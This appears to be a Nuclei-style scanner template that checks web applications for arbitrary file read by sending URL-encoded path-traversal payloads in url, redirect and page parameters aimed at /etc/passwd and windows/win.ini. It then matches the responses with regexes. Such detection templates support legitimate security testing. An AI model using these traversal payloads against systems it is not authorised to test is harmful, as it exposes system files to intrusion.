id: arbitrary-file-read info: name: Arbitrary File Read author: Sushant Kamble (https://in.linkedin.com/in/sushantkamble) severity: high description: Searches for /etc/passwd on passed URLs. requests: - method: GET path: - "{{BaseURL}}/?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd" - "{{BaseURL}}/?redirect=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd" - "{{BaseURL}}/?page=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd" - "{{BaseURL}}/?redirect=..%2f..%2f..%2f..%2fwindows/win.ini" - "{{BaseURL}}/?page=..%2f..%2f..%2f..%2f..%2fwindows/win.ini" - "{{BaseURL}}/?url=..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini" matchers-condition: and matchers: - type: status status: - 200 - type: regex regex: - "root:[x*]:0:0:" - "\\[(font|extension|file)s\\]" condition: or part: body